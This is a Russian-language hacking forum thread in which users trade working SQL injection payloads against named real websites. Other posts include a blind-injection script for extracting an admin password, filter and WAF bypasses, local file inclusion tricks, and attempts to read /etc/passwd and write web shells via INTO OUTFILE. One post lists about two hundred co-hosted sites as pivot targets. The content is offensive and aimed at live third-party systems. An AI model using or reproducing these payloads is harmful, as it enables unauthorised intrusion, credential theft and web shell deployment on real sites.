url_begin="
^
SyntaxError: EOL while scanning string literal
Ups said:
Не могу запустить сплойт.
Code:
#!/usr/bin/python
#-*- coding: utf-8 -*-
# coded by BlueH4G _http://blueh4g.org_
import urllib,re
from time import sleep
def main() :
chk = re.compile("true_title")
url_begin="
http://t.blueh4g.org/technote7/board.php?board=freeboard&sort=(case%20("
url_end=")%20when%20true%20then%20no%20else%20uid%20end)%20 asc%20limit%200,1%23"
result="result : "
for spos in range(1,14):
ch=0
for i in range(1,8) :
sleep(0.05)
query="select%20substr((select%20lpad(bin(ascii(substr(m_ pass,"+str(spos)+",1))),7,0)%20from%20a_tn3_memberboard_list%20order %20by%20m_level%20desc%20limit%200,1),"+str(i)+",1)=1
data=urllib.urlopen(url_begin + query + url_end)
text=data.read()
if chk.search(text) :
ch += 2**(7-i)
result+=chr(ch)
print result
main()
C:\Python27>root.py
File "C:\Python27\root.py", line 9
url_begin="
^
SyntaxError: EOL while scanning string literal
попробуй так url_begin="ссылко" или url_begin=" "
или ваще убери "
NaX[no]rT
16.06.2011, 04:50
Ups said:
Code:
C:\Python27>root.py
File "C:\Python27\root.py", line 17
query="select%20substr((select%20lpad(bin(ascii(substr(m_ pass,"+str(spos)+",
1))),7,0)%20from%20a_tn3_memberboard_list%20order% 20by%20m_level%20desc%20limit%
200,1),"+str(i)+",1)=1
^
SyntaxError: EOL while scanning string literal
привет, дружище) расскажи в общих словах почему ты даже не удосужился поискать в поисковой системе google по коду ошибки?
На твой взгляд что значит аббревиатура EOL?
Гуглил, но не понял как решить проблему.
Как это раскрутить
http://www.onradio.gr/play_old.php?id=245+union+AlL+sElEcT+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33
Error Based же:
http://www.onradio.gr/play_old.php?id=245%20or%201%20group%20by%20concat (version(),floor(rand(0)*2))%20having%20min(0)%20o r%201%20--%20-
kroŧ said:
Как это раскрутить
http://www.onradio.gr/play_old.php?id=245+union+AlL+sElEcT+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33
в чём проблема?
Code:
http://www.onradio.gr/play_old.php?id=-245+union+select+1,concat_ws%280x3a,version%28%29, database%28%29,user%28%29%29,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33+--+
http://www.onradio.gr/play_old.php?id=1+union+select+1,version(),3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33+--+
кроме ошибки ни чего не выводит версию не прозывает,
смог только имя базы узнать onrad2_radio
http://www.onradio.gr/play_old.php?id=1+union+select+1,version(),3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33+FROM+users--+
Если при запросе union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33
ни выводит ни одну из цифр значит ни чего не сделать?
sourcec0de
16.06.2011, 16:28
kroŧ said:
http://www.onradio.gr/play_old.php?id=1+union+select+1,version(),3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33+--+
кроме ошибки ни чего не выводит версию не прозывает,
смог только имя базы узнать onrad2_radio
http://www.onradio.gr/play_old.php?id=1+union+select+1,version(),3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33+FROM+users--+
Если при запросе union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33
ни выводит ни одну из цифр значит ни чего не сделать?
зафолсите запрос, там есть вывод
http://www.onradio.gr/play_old.php?id=1+and(version()=user())+union+sele ct+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+
Ребята инклуд локал на вин серве, залить ничего не могу, стоит иис, что б такое проинклюдить чтобы заполучить шелл?
shell_c0de
17.06.2011, 01:11
Lijzer said:
Ребята инклуд локал на вин серве, залить ничего не могу, стоит иис, что б такое проинклюдить чтобы заполучить шелл?
тынц (https://rdot.org/forum/showthread.php?t=365)
2shell_code Знаю на зубок эту тему, вот только написал, что стоит IIS (а не апач), и да ошибку мускула сделать не могу, чтобы проинклюдить логи мускула. фтп не стоит.
з.ы. за отклик спасибо шелл
server-status и server-info
Открыты файлы sever-status и server-info.
Что злоумышленник может сделать, используя эту информацию?
Н-р:
http://ts-tvoimir.ru/server-status
Кроме как использовать эту информацию при ддосе, больше же ничего он не почерпнет из этих файлов?
Есть ли в IIS какие нибудь файлы содержащие пути к виртуальным каталогам?
http://www.sait.com/news.php?id=12+uNiOn+all+seLeCT+1,2,3,concat(grant ee,0x3a,is_grantable),5,6,7,8+from+information_sch ema.user_privileges
Выдает
'user'@'%':NO:USAGE 1 строка
http://www.sait.com/news.php?id=12+uNiOn+all+seLeCT+1,2,3,PRIVILEGE_TY PE,5,6,7,8+from+information_schema.user_privileges +where+IS_GRANTABLE=0x594553
пусто
делаю тоже самое но на localhost работает, может кто сталкивался с эти, хотел бы узнать права юзера но как это сделать?
Пишу запрос +union+select+1,2,3,4,5,6,7,8+--
Нужной цифрой является 2. И когда я посылаю что то по типу: +union+select+1,user(),3,4,5,6,7,8+-- или +union+select+1,database(),3,4,5,6,7,8+-- предо мной загружается чистейший, белый лист.
В чем тут проблема? Как это исправить? С какой стороны подойти?
Expl0ited
18.06.2011, 22:00
unhex(hex(user())) или @@version
Expl0ited
18.06.2011, 22:02
Lijzer said:
Ребята инклуд локал на вин серве, залить ничего не могу, стоит иис, что б такое проинклюдить чтобы заполучить шелл?
Шелл в 98% /showpost.php?p=2691294&postcount=17
Expl0ited, да, спасибо. @@version сработало. Вот @@user() @@database... Не то.
Можешь меня ткнуть носом где об этом почитать? То как так использовать подобное. Уж очень хочется ее раскрутить.
Fooog said:
Expl0ited
, да, спасибо. @@version сработало. Вот @@user() @@database... Не то.
Можешь меня ткнуть носом где об этом почитать? То как так использовать подобное. Уж очень хочется ее раскрутить.
@@user и @@database не заработали, потому что нету таких системных переменных, походу у тебя фильтрация скобок
пробуй пост запросы
Expl0ited
19.06.2011, 09:03
Fooog said:
Expl0ited
, да, спасибо. @@version сработало. Вот @@user() @@database... Не то.
Можешь меня ткнуть носом где об этом почитать? То как так использовать подобное. Уж очень хочется ее раскрутить.
Ну стало ясно что фильтруются скобки, можешь спокойно крутить без их использования, просто отказавшись от функций, используя стандартный набор union select column from table where column=data limit 1
Как вот это юзать - Apache 2.2.14 mod_isapi Dangling Pointer ??
Expl0ited
19.06.2011, 16:53
plaeer said:
Как вот это юзать - Apache 2.2.14 mod_isapi Dangling Pointer ??
http://securityreason.com/exploitalert/7905
Expl0ited said:
http://securityreason.com/exploitalert/7905
Спасибо, но я уже в гугле побывал несколько раз. Как сплоиты под винду юзать вообще не представляю. С виндою не очень дружу...
stasiliy
20.06.2011, 13:46
Помогите плз.
Если $_POST не фильтруеться. НА сервере вот какая проверка идет:
if ($_POST['password'] == $passwd)
$_SESSION['_user'] = "admin";
else
echo"Error";
Что можно подставить, чтобы обойти этот IF ??
Спасибо
winstrool
20.06.2011, 14:31
stasiliy said:
Помогите плз.
Если $_POST не фильтруеться. НА сервере вот какая проверка идет:
Что можно подставить, чтобы обойти этот IF ??
Спасибо
если есть доступ к исходникам, то просто найди присвоеное значение переменной $passwd
Как можно обойти такой фильтр?
http://www.onlymelbourne.com.au/melbourne.php?id=-371/*!UNioN*/SELeCT+1
просто переходит на:
http://www.onlymelbourne.com.au/melbourne.php
Заранее благодарю за любой ответ.
stasiliy
20.06.2011, 15:11
kroŧ said:
Как можно обойти такой фильтр?
http://www.onlymelbourne.com.au/melbourne.php?id=-371/*!UNioN*/SELeCT+1
просто переходит на:
http://www.onlymelbourne.com.au/melbourne.php
Заранее благодарю за любой ответ.
Я думаю никак.
Будет редирект всегда, там фильтры на слова ORDER, UNION,SELECT
Подобрал колличество полей. Вылезло Forbidden
можно как то обойти?)
_http://philshopping.com/product_info.php?id=302+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13--
GroM88 said:
Подобрал колличество полей. Вылезло
Forbidden
можно как то обойти?)
_http://philshopping.com/product_info.php?id=302+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13--
http://philshopping.com/product_info.php?id=302+and+1=0+union(select+1,2,3 ,4,5,6,7,8,9,10,11,12,13)+--+
stasiliy
20.06.2011, 17:24
Через Php-injection вытащил dbconfig.php
$dbhost="localhost";
Пробую подключиться, вместо localhost пишу ip домена.
К базе подключаеться , а вот mysql_connect_db не работает
В чем может быть проблемма?
спасибо
stasiliy said:
Через Php-injection вытащил dbconfig.php
$dbhost="localhost";
Пробую подключиться, вместо localhost пишу ip домена.
К базе подключаеться , а вот mysql_connect_db не работает
В чем может быть проблемма?
спасибо
может mysql_select_db() ?
stasiliy
20.06.2011, 17:51
Konqi said:
может mysql_select_db() ?
Да, просто ошшибку сделал когда вам писал.
вот что пишет
Access denied for user 'user1_style_adm'@'%' to database 'user1_style'
stasiliy said:
Да, просто ошшибку сделал когда вам писал.
вот что пишет
http://google.ru/translate
нету доступа к этой базе
Не получается вывести определенное поле из таблицы MySQL. Причем поле довольно странное.
SELECT count(field) FROM table
1234
SELECT count(field) FROM table WHERE LENGTH(field)>0
1234
SELECT LENGTH(field) FROM table LIMIT (1/10/1000),1
0
Пробовал AES_(EN/DE)CRYPT, HEX - на страницу ничего не выводится.
winstrool
20.06.2011, 18:06
stasiliy said:
Через Php-injection вытащил dbconfig.php
$dbhost="localhost";
Пробую подключиться, вместо localhost пишу ip домена.
К базе подключаеться , а вот mysql_connect_db не работает
В чем может быть проблемма?
спасибо
если пытаешься удоленно подключиться, то часто бывает что отключена функция удаленного в mysql, попробуй поискать phpmyadmin или cpanel, от туда и пытайся зайти...
на сайте в поиске ввожу "/XSS/?> оно мне выдает найдено 0 записей по запросу '\"/XSS/?>'
подставляю еще ' выдает тоже самое только '\'\\\"/XSS/?>' подставляю еще ' выходит '\'\\\'\\\\\\\"/XSS/?>' и после этого когда я подставляю ' выдает результат поиска Оо - первых 20 записей категории
XSS ?
alexvrn said:
Code:
SQL Ошибка для [select id from phpshop_categories where seoname='-3'/**//*!union*//**//*!select*//**/version(),1,2,3,4,5,6--+'' limit 1]
The used SELECT statements have a different number of columns
-3'/**//*!union*//**//*!select*//**/version(),1,2,3,4,5,6--+'
ты вообще читаешь что оно тебе написало?
select id from phpshop_categories where seoname='-3'/**//*!union*//**//*!select*//**/version(),1,2,3,4,5,6--+'' limit 1
foozzi said:
на сайте в поиске ввожу "/XSS/?> оно мне выдает найдено 0 записей по запросу '\"/XSS/?>'
подставляю еще ' выдает тоже самое только '\'\\\"/XSS/?>' подставляю еще ' выходит '\'\\\'\\\\\\\"/XSS/?>' и после этого когда я подставляю ' выдает результат поиска Оо - первых 20 записей категории
XSS ?
https://forum.antichat.net/thread104591.html
есть ли русский фак по nikto 2?
самому сложновато разобраться прописую например perl nikto.pl -h 91.20*.***.94
сканирует только директории и файлы.
Что прописывать например для обнаружения sql или php inj?
(Ubuntu)
Cybersteger
20.06.2011, 20:30
kroŧ said:
Как можно обойти такой фильтр?
http://www.onlymelbourne.com.au/melbourne.php?id=-371/*!UNioN*/SELeCT+1
просто переходит на:
http://www.onlymelbourne.com.au/melbourne.php
Заранее благодарю за любой ответ.
и stasiliy
можна так
Code:
http://www.onlymelbourne.com.au/melbourne.php?id=371+%61nd+1=0+%75nion+%73elect+(% 73elect(@x)%66rom(%73elect(@x:=0x00),(%73elect(nul l)%66rom(%69nformation_schema.%63olumns)%77here
(%74able_schema!=0x696e666f726d6174696f6e5f7363686 56d61)%61nd(0x00)%69n
(@x:=%63oncat(@x,0x3c62723e,table_schema,0x2e,tabl e_name,0x3a,%63olumn_name))))x)
пс:убрать пробели
Доброго времени суток уважаемые,
Есть вопрос:
1. Эксплуатирую одну очень важную blind inj.
Пользователь, из под которого запущена БД привилегированный, т.е. имеет права FILE_PRIV = Y, INSERT_PRIV = Y и тд..
При использовании конструкции
Code:
SELECT LOAD_FILE('/etc/passwd')
я могу получить список из passwd, и ничего кроме /etc/passwd я прочитать не могу.. Могу ли я читать что нибудь кроме passwd, в той же /etc/ или в любом другом каталоге? Если да, то у меня не выходит.. Читает только /etc/passwd... Может кто нибудь объяснить?
З.Ы: БД, запросы к которой я посылаю, находится на другом серве, т.е. не на том же сервере что сам сайт.
1.1. Возможно ли как нибудь узнать, каков IP адрес у этого сервера с MySQL ?
2. Пытаюсь залить веб шелл, не выходит.
Code:
SELECT '' FROM mysq.user INTO OUTFILE '/rdb-cluster/sites/somesite.com/htdocs/images/info.php'
АХТУНГ, вопрос: Выполняя запрос на заливку шелла, я указываю веб путь на сервере с MySQL или же тот, где используется сценарий? А если MySQL поднят на машине, где вообще нет веб директорий.. То бишь апачи не поднят.. Я так понимаю про шелл через скулю забыть?
Если же веб путь указывать надо на сервере с апачи, то вот:
FILE_PRIV = Y
Full path взятый из phpinfo самого сайта = /rdb-cluster/sites/somesite.com/htdocs/
По адресу foo.somesite.com/.svn/ я нашел исходники, в которых подключались конфиги с подключением к БД:
PHP:
include('/data/vhosts/www.somesite.com/htdocs/inc/conf.php')
То бишь: /data/vhosts/www.somesite.com/htdocs/
Из файла entries в той же /.svn/, я выдернул следующую запись:
/home/user/websites/foo.somesite.com/ .....
Я немного запутался, и голова идет кругом, подскажите пожалуйста, откуда столько путей? Какой из них "тот самый" ?
С уважением, надеюсь кто нибудь поможет!
support/button.php?image=asdasd
Получаю ошибку
Warning: fopen(locales/ru/button/asdasd_off.gif) [function.fopen]: failed to open stream: No such file or directory in [patch]\support\button.php on line 27
no image
Я так понимаю это пхп инекция? Как её заюзать? Сервер на винде.
M_script
21.06.2011, 07:10
plaeer said:
Я так понимаю это пхп инекция?
Нет, это не пхп инъекция.
Можешь использовать для XSS.
Возможно, получится читать файлы на сервере. Например так:
support/button.php?image=../../../../../../../[patch]/support/button.php%00
M_script
21.06.2011, 07:20
ne0k
1. Какие еще файлы ты пытался читать?
1.1. Почитать скрипты, которые обращаются к БД
2. На сервере с MySQL
M_script
21.06.2011, 07:33
kroŧ said:
Как обойти фильтрацию кавычек при заливки файла?
INTO OUTFILE и INTO DUMPFILE обязательно требуют кавычек. В обычных условиях залить ничего не получится. Но исключения бывают, все зависит от конкретного случая.
M_script said:
Нет, это не пхп инъекция.
Можешь использовать для XSS.
Возможно, получится читать файлы на сервере. Например так:
support/button.php?image=../../../../../../../[patch]/support/button.php%00
Спасибо, добрый человек. Но что не работает. Делаю вот так support/button.php?image=../../../../../../../C:/Server/home/localhost/support/button.php%00. Получаю "Wrong parameter used or absent: image" Что не так?
XSS на этом сайтике чёртова куча, но толк от них, если там даже админки нету.
http://www.stanford.edu/group/spatialhistory/cgi-bin/site/page.php?id=-83+union+select+1,2,table_name+from+iNformation_sc hema.tables+--+
почему не выводит результат? ошибки тоже нет, в коде смотрел
foozzi said:
http://www.stanford.edu/group/spatialhistory/cgi-bin/site/page.php?id=-83+union+select+1,2,table_name+from+iNformation_sc hema.tables+--+
почему не выводит результат? ошибки тоже нет, в коде смотрел
хекс хекс хекс
http://www.stanford.edu/group/spatialhistory/cgi-bin/site/page.php?id=-83+union+select+1,unhex(hex(version())),3--
спасибо буду знать
вот еще blind
http://www.bispublishers.nl/bookpage.php?id=142+and+ascii(lower(substring(user (),1,1)))
[QUOTE="foozzi"]
foozzi said:
спасибо буду знать
вот еще blind
http://www.bispublishers.nl/bookpage.php?id=142+and+ascii(lower(substring(user (),1,1)))
d1v said:
с чего ты взял что она слепая? вывод в самом низу.
HTML:
http://www.bispublishers.nl/bookpage.php?id=-142+union+select+1,2,concat_ws(0x3a,name,password) ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46+from+users--
Оо фейл! я проверял у меня выводило 48 полей! да и запрос and 1=2 была пустая страница, такое в blind я читал
M_script
21.06.2011, 17:57
plaeer said:
Что не так?
Во-первых, букву диска писать не надо. Во-вторых, я написал "Возможно, получится читать файлы на сервере. Например так". Все зависит от конкретного сайта, без ссылки нельзя ничего точно сказать.
M_script
MySQL на дебиане 5.0, какие файлы в принципе возможно прочитать? Пробовал читать все подряд, и /etc/mysql/mysqlaccess.conf и /var/www/index.html (по моему по дефолту присутствует, не?) но ничего кроме /etc/passwd..
Почитать скрипты обращающиеся к MySQL не могу, мои запросы ведь исполняются на сервере MySQL, как я могу прочитать скрипты лежащие совсем на другом сервере?.. php include нет, ничего нет.. Кроме проклятой скули.. Нужен очень шелл.. Ну или вся БД, блайндом я ее 3 года дампить буду...
Expl0ited
21.06.2011, 18:23
ne0k said:
M_script
MySQL на дебиане 5.0, какие файлы в принципе возможно прочитать? Пробовал читать все подряд, и /etc/mysql/mysqlaccess.conf и /var/www/index.html (по моему по дефолту присутствует, не?) но ничего кроме /etc/passwd..
Почитать скрипты обращающиеся к MySQL не могу, мои запросы ведь исполняются на сервере MySQL, как я могу прочитать скрипты лежащие совсем на другом сервере?.. php include нет, ничего нет.. Кроме проклятой скули.. Нужен очень шелл.. Ну или вся БД, блайндом я ее 3 года дампить буду...
/thread49775.html
Expl0ited
21.06.2011, 18:51
ne0k said:
Expl0ited
Спасибо за ссылку, как раз что нужно.. Но... Увы, скуля была не на сайте студента 5го курса, а серьезной и немало известной компании.. Кстати мой самый крупный успех в эксплуатировании скулей.. К чему веду, мало того, что дыру они закрыли буквально с час назад, но и сервера все свои перенесли, даже тема поднята, мол двигаем все
Всем спасибо, если кому интересно что за проект был, могу скинуть ссыль в ПМ.
Кидай посмотрим )
на сайте есть sql inj
подобрал поля с помощью GROUP BY потому что ORDER BY не прокатило
пробую узнать версию, все равно выдает ошибку, какая то мудреная inj я с такой не сталкивался подскажите
foozzi said:
на сайте есть sql inj
подобрал поля с помощью GROUP BY потому что ORDER BY не прокатило
пробую узнать версию, все равно выдает ошибку, какая то мудреная inj я с такой не сталкивался подскажите
ссылку в студию
d1v said:
ссылку в студию
http://www.fbskins.com/facebook-layouts/cat.php?id=75
winstrool
21.06.2011, 21:42
foozzi said:
на сайте есть sql inj
подобрал поля с помощью GROUP BY потому что ORDER BY не прокатило
пробую узнать версию, все равно выдает ошибку, какая то мудреная inj я с такой не сталкивался подскажите
там могут быть фильтрации, если есть вывод ошибки то попробуй через блинд, а вообще такие вопросы лудше с линками кидать, дабы можно что то было адекватней ответить по ситуации.
Expl0ited
21.06.2011, 21:51
foozzi said:
http://www.fbskins.com/facebook-layouts/cat.php?id=75
блайнд
Code:
http://www.fbskins.com/facebook-layouts/cat.php?id=(75)and(1)=if(mid((select(version())),1 ,1)=5,1,0)--+
http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,table_name+fro m+information_schema.tables+--+
почему выдает ошибку 500 ?
http://notice.spacash.com/2257.php?id=-2902+union+select+5,unhex(hex(version())),666,666, 666,666,666,666,5,1000--+
ответ на твой вопрос.
версия 4+
M_script said:
foozzi
из-за "from"
http://notice.spacash.com/2257.php?id=-2902+--+from
http://notice.spacash.com/2257.php?id=-2902+--+frm
зато http://notice.spacash.com/2257.php?id=-2902/*from*/
M_script
22.06.2011, 01:26
попугай, ошибся.
http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,10+--+from
http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,10+--+/*from*/
http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,10+--+frm
http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,10+--+/*frm*/
http://notice.spacash.com/2257.php?id=-2902/*select+*//*from*/
upd:
http://notice.spacash.com/2257.php?id=-2902+union+select/**/1,2,3,4,5,6,7,8,9,10+from+XXX+--+
Expl0ited
22.06.2011, 01:40
Code:
notice.spacash.com/2257.php?id=(0)union+select(1),hex(version()),3,4, 5,6,7,8,9,(10)from(table)--+
[upd] не успел чуток )
Sql injection на Sybase кто нибудь пробивал?
M_script said:
попугай
, ошибся.
http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,10+--+from
http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,10+--+/*from*/
http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,10+--+frm
http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,10+--+/*frm*/
upd:
http://notice.spacash.com/2257.php?id=-2902/*select+*//*from*/
Точно, фильтруется from. Только как то избирательно.
http://notice.spacash.com/2257.php?id=2902+from
M_script
22.06.2011, 02:32
попугай said:
Точно, фильтруется from. Только как то избирательно.
Фильтруется, если между "select " и "from" есть любой символ.
Есть скуля в поиске, но никак не получается составить истинное выражение для правильного вывода.
Думал что так пройдёт, но всё равно тоже ругается
Code:
http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=12'+and+'1'='('1
UPD Для обрезки запроса только ядовитые нули помогают, но запрос всё равно остаётся ложным
Code:
http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=12'+and+'1'='1%00
Expl0ited
22.06.2011, 10:40
BigBear said:
Есть скуля в поиске, но никак не получается составить истинное выражение для правильного вывода.
Думал что так пройдёт, но всё равно тоже ругается
Code:
http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=12'+and+'1'='('1
UPD Для обрезки запроса только ядовитые нули помогают, но запрос всё равно остаётся ложным
Code:
http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=12'+and+'1'='1%00
Так хорошо задал вопрос, и так нелепо упустил скобку во внимании
Code:
http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=0')union(select(1),(select(@x)from(select(@ x:=0x00),(select(0)from(information_schema.columns )where(table_schema!=0x696e666f726d6174696f6e5f736 368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,tab le_schema,0x2e,table_name,0x3a,column_name))))x),3 ,4,5,6,7,8)--+1
Expl0ited said:
Так хорошо задал вопрос, и так нелепо упустил скобку во внимании
Code:
http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=0')union(select(1),(select(@x)from(select(@ x:=0x00),(select(0)from(information_schema.columns )where(table_schema!=0x696e666f726d6174696f6e5f736 368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,tab le_schema,0x2e,table_name,0x3a,column_name))))x),3 ,4,5,6,7,8)--+1
Огромное спасибо, разобрался.
Единственная проблема - данные из userlist не подходят для админки
Code:
http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=0')union(select(1),(2),3,4,concat_ws(0x3a,u ser,pass),6,7,8+from+userlist+limit+0,1)--+1
А Админка тут
Code:
http://sport-razgrom.ru/admin
Где ещё помимо мускула может лежать пасс от админки ?
Expl0ited
22.06.2011, 13:11
Может быть банальная проверка
PHP:
[upd] да там бейсик авторизация, пароль хранится в файле.
Печально. Обломался шелл значит.
Expl0ited
22.06.2011, 13:42
BigBear said:
Печально. Обломался шелл значит.
Вообщем, если тебе ну очень интересно повысить свои права до веб-шелла на этом ресурсе, то я бы на твоем месте не расстраивался, а искал дальше. Тем более, что на сервере, по реверсу еще порядка 200 сайтов, на одном из них уж точно можно будет залиться, а действовать локально часто более результативно, чем извне.
Вот списочек сайтов:
Code:
segway-city.ru
www.abcde.by
www.germida.com
www.sjp.su
gay-country.ru
www.vashyprava.ru
zaschita.name
agnivo.ru
www.samara777.ru
tpgrad.ru
www.zazerye.by
www.zaitsevmedia.ru
www.gualcolors.ru
www.podaroknebes.ru
af-school.ru
bookfeel.ru
www.stylish-stuff.ru
asgardstudio.ru
igroson.ru
rubezh-kaluga.ru
skottishfold.ru
lostidea.ru
mobilaport.ru
www.farwel.ru
pos-reklama.ru
servers-saintp.ru
honda-electric.ru
vabene-mobili.ru
www.server-life.ru
games4pro.com
www.akva-dv.ru
www.avtovek73.ru
mebelshik-msk.ru
www.realborneo.ru
www.photoka.info
www.violetta.su
www.ymuhin.ru
it-otdel.org
shko-la.ru
www.26-it.ru
cookerblog.ru
charter-vip.com
zdphoto.ru
www.mobport.ru
citymotors.ru
www.kamerton-realty.ru
adventure-team.pro
21antenna.ru
cleanprint.ru
www.air-industry.ru
proactive-capital.com
worldlegend.ru
www.kanca.ru
insideinform.ru
salon-flamingo.ru
agspec.ru
3d.globatek.ru
ru925.ru
smerchserver.ru
www.catportal.ru
www.zhostovo.com
www.edinstwo.ru
mardanov.info
zadelkin.ru
www.uralteploservis.ru
tronlegacy.biz
www.turist-vodnik.ru
oletta.ru
pfiff.ru
stolnikov-motors.ru
www.belwebdesign.com
parketmoskva.ru
doskarus.ru
www.lingvoprofessional.ru
www.rosstroy.me
www.baki-n.ru
ibfd-fund.com
barnaulkapstroy.ru
www.kuzaluplast.ru
shtuchkipro.ru
www.openeyes.ru
ribak-ribaka.ru
nnbuyback.com
belayagora.info
el-svoboda.ru
vash-shans.com
forum.servers-saintp.ru
mertix.ru
domenhost.com
forex-grail.ru
www.unplate.com
www.it-26.ru
eucvot.net
imagophoto.ru
pizza-stavropol.ru
1seconds.ru
www.masterfreetzi.ru
www.diezel-truck.ru
topatulyashuz.ru
www.mt-m.ru
chidori-profit.com
predict1on.ru
www.exclusive-st.ru
www.kenotrontv.ru
www.stroyteploservis.ru
www.fmr.su
apple-star-films.com
svetoart.ru
filnauki.ru
ekhb.ru
kopeikina.com
www.yafanatkino.ru
dentolife.ru
www.megapechi.ru
mosarte.ru
www.probro.ru
76yar.ru
100lotov.ru
vivadizain.ru
answers-mail1.ru
www.alkonomsk.ru
www.blogogolik.ru
www.piercer.ru
www.relaxtea.ru
mebel-stavropol.ru
www.flyfishka.ru
medspravka24.com
dentime.ru
нейроклуб.рф
margo.cc
www.1alfa.ru
pelmen.org
www.russlines.ru
forexbc.ru
iportugal.ru
mobila51.com
special4kids.ru
www.doctor-stapel.ru
www.denapak.ru
jantars.ru
mosivphotos.com
tur-topik.ru
hstars.ru
sport-razgrom.ru
lazarevo43.ru
www.bostoncar.ru
www.sabahtea.ru
www.trawka.ru
donysoft.com
avtoremontes.ru
bestwax.ru
artkadr.ru
buhvolga.ru
школа-40.рф
selo-zavetnoe.ru
armada-forward.com
proficom.org
www.turpoisk-kaluga.ru
dress2.ru
tg-marka.ru
www.gce42.ru
mary-care.ru
www.discprint.ru
xx76.ru
kaluga-electro.ru
www.livedoors.ru
bigreferat.ru
borodina-diet.ru
torti.uz
auditenergo.com
www.housecomplect.ru
www.yam-mebel.ru
stroikapro.com
www.baikalboat.com
picimage.ru
rimtermy.ru
doma1ns.ru
gachirkov.com
gercules.com
burointerior.com
www.tesk72.ru
universepw.ru
moiorigami.ru
imdi.ru
yurikoff.com
www.kolgotki-belie.ru
artidelo.ru
www.stopholod.ru
www.otel89.ru
agrohimsnab.ru
rabobo.ru
planmytrip.ru
www.la2galaxy.ru
inflat.ru
sexperts.ru
arshu.ru
salongavrosh.ru
best4girls.ru
forex-rts.ru
cards2.ru
www.avto-instrument.net
legalka-tver.ru
moivyshivki.ru
fotolok.ru
Сервак конечно не порутается, т.к.:
Code:
Linux server18.hosting.reg.ru 2.6.26-2-amd64 #1 SMP Tue Jan 25 05:59:43 UTC 2011 x86_64
Но можно надеяться на криво-выставленные права, бэкапы, забытый .bash_history, бажный демон или еще какую вкусняшку.
Да я искал уже. Проблема в том, что хостинг сразу предлагает предустановленные движки аля джумла или вордпресс, ессно пропатченные.
Редко кто юзает самопис.
А те кто юзает, админки не держат ибо почти везде html.
Редко где самопис на пхп, да и админки не везде.
Вот один из сайтов в списке.
Code:
http://100lotov.ru/objects.php?type=3+and+1=2+union+select+1,concat_w s(0x3a,table_name,column_name)+from+information_sc hema.columns+--+
alexvrn said:
-3'/**//*!union*//**//*!select*//**/4--'
показывает страницу с id 4 как вывести версию базы и т.д помогите
Покажи линк - быстрее помогут )
Expl0ited
22.06.2011, 14:58
alexvrn said:
-3'/**//*!union*//**//*!select*//**/4--'
показывает страницу с id 4 как вывести версию базы и т.д помогите
Ну по всей видимости вывод попадает в заголовок Location, и очевидней будет сделать так
Code:
-3'/**//*!union*//**//*!select*//**/version()--'
Такой вопрос, прочитал через скуль конфиг цмс
dbhost = localhost
dbuser = lalala
dbname = lalal2
dbpass = password
pma на хосте нет, пытаюсь с локалхоста через свой пхпмуадмин подключится
пишу в конфиге phpmyadmin'a
host site.ru
pass lalala,
db и т.п.
пишет (2003) нет конекта к серверу
Вопрос почему? если в конфиге написано сервер дб = localhost
Ну или как можно узнать какой ип у ДБ = \
Порт вроде стандартный, в php.ini смотрел = \
shell_c0de
22.06.2011, 15:15
вроде и так все понятно что коннект с БД только с локалки + удаленный коннект запрещен... порт то 3306 просканил хоть перед коннектом ?
GroM88 said:
Такой вопрос, прочитал через скуль конфиг цмс
dbhost = localhost
dbuser = lalala
dbname = lalal2
dbpass = password
pma на хосте нет, пытаюсь с локалхоста через свой пхпмуадмин подключится
пишу в конфиге phpmyadmin'a
host site.ru
pass lalala,
db и т.п.
пишет (2003) нет конекта к серверу
Вопрос почему? если в конфиге написано сервер дб = localhost
